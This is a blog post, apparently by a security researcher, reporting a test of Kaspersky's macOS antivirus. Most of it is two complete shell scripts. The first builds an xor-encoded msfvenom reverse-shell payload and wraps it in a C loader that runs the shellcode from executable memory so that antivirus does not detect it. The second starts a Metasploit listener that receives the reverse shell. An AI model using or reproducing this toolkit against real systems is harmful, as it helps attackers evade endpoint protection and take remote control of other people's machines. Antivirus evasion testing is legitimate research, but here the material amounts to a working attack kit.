Next in line for the tests is Kaspersky. (There has been lately a political turmoil about them which is kind of childish. US accusing Russia of spying ..haha .. these two countries spy on each other for decades … yawn)
There is no free version, so we are stuck with a trial which you can download from https://usa.kaspersky.com/mac-security
TL;DR we can get the same code executed fine like with Avast with our custom payload https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/ I was curious about the Network Attack blocker function on OSX, as I remember that this thing was quite good on Windows in blocking certain meterpreter operations.
Kaspersky detects all EICAR and standard msfvenom generated stuff as well as the JAR payloads.
So again we try the custom source code template and the shellcode as shown here
Here is a generator for the above to make life easier .. OSX-x64-payload-generator.sh
#!/bin/bash
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi
echo '[*] Cleaning up '
rm -f osx64-payload.c
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c
echo '#include <stdint.h>' >> temp.c
echo '' >> temp.c
cat test.c >> temp.c
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'printf("ret: 0x%x",ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo '' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
echo '[-] Something went wrong .. '
exit 0
fi
And the listener LISTENER-MAC-LATEST.sh
#!/bin/bash clear echo "***************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo " For Automatic Teensy programming and deployment " echo "***************************************************************" echo -e "What IP are we gonna listen to ? \c" read host echo -e "What Port Number are we gonna listen to? : \c" read port echo "Starting the meterpreter listener.." echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/shell_reverse_tcp ; set LHOST ' > run.listener.sh echo -n $host >> run.listener.sh echo -n '; set LPORT ' >> run.listener.sh echo -n $port >> run.listener.sh echo -n '; run"' >> run.listener.sh chmod +x run.listener.sh ./run.listener.sh
Here we have some screenshots of c0mpilation and execution of the custom meteasploit payload on OSX with Kaspersky
Thats all for now :)
